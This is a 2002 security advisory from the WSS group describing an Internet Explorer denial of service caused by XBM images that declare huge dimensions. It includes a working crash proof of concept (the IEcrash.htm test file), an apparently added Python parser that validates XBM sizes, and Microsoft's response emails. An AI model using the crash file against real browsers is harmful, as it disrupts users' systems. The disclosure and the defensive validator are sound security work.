A specially formatted image file can cause an IE denial of service

Author : tombkeeper
Email : tombkeeper@whitecell.org
HomePage: http://www.whitecell.org

Vulnerability class: Windows, IE, remote DoS


Systems tested and found affected:

Microsoft Internet Explorer 6.0

- Microsoft Windows 2000 Server SP2 SRP
- Microsoft Windows 2000 Advanced Server SP2 SRP
- Microsoft Windows 98SE
- Microsoft Windows NT 4.0 SP6a

Microsoft Internet Explorer 5.0

- Microsoft Windows 2000 Server SP2 SRP
- Microsoft Windows 2000 Advanced Server SP2 SRP
- Microsoft Windows 98SE
- Microsoft Windows NT 4.0 SP6a

Systems not tested:

Microsoft Internet Explorer 5.5 on all platforms

and the Microsoft Windows 2000 Professional platform


Description:

Save the following code to a file. Whatever its extension, requesting it directly
in IE or referencing it as an image from an HTML file displays it normally as a
16x16-pixel bitmap image.

#define odo_width 16
#define odo_height 16
static char odo_bits[] = {
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
};

The above applies to remote files. When the file is opened on the local machine,
its extension must be one the browser does not display itself: not html, txt, gif,
jpg and the like, but zip, exe, xxx or some other unknown extension. It can then
be referenced as an image from an HTML file.

When odo_width and odo_height are set to extremely large values, IE does not check
the actual size of the file; it allocates memory directly according to the
odo_width and odo_height values. System resources are exhausted, and the system
finally calls DbgBreakPoint to kill the IE process.

Previewing the file in Explorer or viewing it as HTML mail behaves the same way.


Test code:

Save the following code as IEcrash.htm and place it in the web directory:

#define odo_width 22222222222222222222
#define odo_height 22222222222222222222
static char odo_bits[] = {
0xFF,
};

In the browser, enter: http://127.0.0.1/IEcrash.htm
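The root cause described above is a loader that trusts the declared odo_width and odo_height and allocates before comparing them with anything. The following XBM parser is an added example written for this page, not code from the advisory, IE or mshtml. It performs the two checks the advisory says were missing, an absolute allocation cap and a comparison of the declared geometry against the bytes actually present, before any pixel buffer is created. The sample inputs are the 16x16 image from the description and the IEcrash.htm header from the test code, plus one constructed file; the MAX_PIXELS limit is an assumption chosen for the example.

```python
import re

# Upper bound on the pixels we will allocate for one image.
# Assumed value for this example; the advisory itself names no limit.
MAX_PIXELS = 16_384 * 16_384


class XbmError(ValueError):
    """Raised when an XBM header or bits array fails validation."""


# #define <name>_width <n>  /  #define <name>_height <n>
_DEFINE_RE = re.compile(r'#define\s+\w+_(width|height)\s+(\d+)')
# static [unsigned] char <name>_bits[] = { ... };
_BITS_RE = re.compile(
    r'static\s+(?:unsigned\s+)?char\s+\w+_bits\s*\[\]\s*=\s*\{(.*?)\}', re.S)
_BYTE_RE = re.compile(r'0[xX][0-9a-fA-F]+|\d+')


def parse_xbm(text, max_pixels=MAX_PIXELS):
    """Parse XBM text into (width, height, rows).

    rows is a list of `height` lists, each holding `width` 0/1 pixel values.
    Both dimension checks run before any pixel buffer is allocated, which is
    the step the advisory says the IE loader skipped.
    """
    dims = {kind: int(value) for kind, value in _DEFINE_RE.findall(text)}
    if 'width' not in dims or 'height' not in dims:
        raise XbmError('missing width/height #define')
    width, height = dims['width'], dims['height']
    if width <= 0 or height <= 0:
        raise XbmError('non-positive dimensions')
    # Check 1: bound the declared size before trusting it for an allocation.
    # Python ints cannot overflow, so the 20-digit values in IEcrash.htm are
    # compared exactly; a C implementation must guard the multiplication
    # itself, which is why the test is written as height > max // width.
    if width > max_pixels or height > max_pixels // width:
        raise XbmError(f'declared {width}x{height} exceeds {max_pixels} pixels')
    m = _BITS_RE.search(text)
    if m is None:
        raise XbmError('missing bits array')
    data = [int(tok, 16) if tok.lower().startswith('0x') else int(tok)
            for tok in _BYTE_RE.findall(m.group(1))]
    if any(b > 0xFF for b in data):
        raise XbmError('byte value out of range')
    bytes_per_row = (width + 7) // 8
    needed = bytes_per_row * height
    # Check 2: the declared geometry must be backed by enough actual data.
    # Surplus bytes are tolerated, as the advisory's 35-byte 16x16 sample shows.
    if len(data) < needed:
        raise XbmError(f'bits array holds {len(data)} bytes, {needed} needed')
    # XBM packs pixels least-significant bit first within each byte.
    rows = []
    for y in range(height):
        row = data[y * bytes_per_row:(y + 1) * bytes_per_row]
        rows.append([(row[x >> 3] >> (x & 7)) & 1 for x in range(width)])
    return width, height, rows


# The 16x16 sample from the advisory's description section.
GOOD_XBM = """#define odo_width 16
#define odo_height 16
static char odo_bits[] = {
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
};
"""

# The IEcrash.htm header from the advisory's test-code section.
CRASH_XBM = """#define odo_width 22222222222222222222
#define odo_height 22222222222222222222
static char odo_bits[] = {
0xFF,
};
"""

# Constructed for this example: a modest declared size with far too little data.
SHORT_XBM = """#define odo_width 64
#define odo_height 64
static char odo_bits[] = {
0xFF,
};
"""


def check(text):
    """Return 'ok WxH' when the image validates, otherwise the rejection reason."""
    try:
        w, h, _ = parse_xbm(text)
        return f'ok {w}x{h}'
    except XbmError as e:
        return f'rejected: {e}'


if __name__ == '__main__':
    for name, text in (('good', GOOD_XBM), ('crash', CRASH_XBM), ('short', SHORT_XBM)):
        print(name, check(text))
```

Running the module validates the description's image, rejects the IEcrash.htm header at the allocation cap before any size arithmetic matters, and rejects the constructed file because its single byte cannot back a 64x64 image.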


Solution:

We have notified Microsoft, who have promised to fix this issue in the next Service
Pack. WSS recommends that you do not browse untrusted websites and do not view mail
as HTML. Until Microsoft provides a security patch, stop using the IE browser, or
disable image support in IE.


Acknowledgements:

Thanks to Refdom (refdom@263.net) of the iDuba Security Team for help with testing.


Appendix: Microsoft's replies

----- Original Message -----
From: Microsoft Security Response Center
Cc: Microsoft Security Response Center
Sent: Thursday, April 25, 2002 2:58 AM
Subject: RE: A vulnerability of Crashing IE [MSRC 1129LT]


Hi -

Thanks very much for your note. I'll start an investigation of this
issue immediately, and will let you know what I find out. In the
meantime, I've assigned tracking number MSRC 1129LT to this issue. If
you would keep it in the subject line of future notes on the subject, it
would make it easier to get status information for you.

Regards

Secure@microsoft.com

----- Original Message -----
From: Microsoft Security Response Center
Cc: Microsoft Security Response Center
Sent: Tuesday, May 14, 2002 5:35 AM
Subject: RE: A vulnerability of Crashing IE [MSRC 1129LT]


Hi,

I wanted to update you on this issue and let you know where we are in
our testing. The devs found that there is a problem in mshtml but were
unable to run any exploit, only crash IE. They have suggested that a
service pack level fix would be best for this kind of problem for two
reasons. First, and most importantly, service packs get better testing
and so there are fewer potential problems than with patches. Secondly,
the developers could not run any kind of exploit other than crashing IE.
We are committed to fixing this but would prefer to do it in the next
service pack.

Please let me know if we have missed something or if you have any
feedback you want to share. Thanks again for bringing this issue to our
attention and for providing valuable feedback.

Regards,

secure@microsoft.com


About us:

WSS (Whitecell Security Systems) is a non-profit, independent technical group
devoted to research on all kinds of system security technology. It upholds the
traditional hacker spirit and pursues technical purity.

WSS homepage: http://www.whitecell.org/
WSS forum: http://www.whitecell.org/forum/


Copyright 「黑白网络工作室」 2002. All Rights Reserved.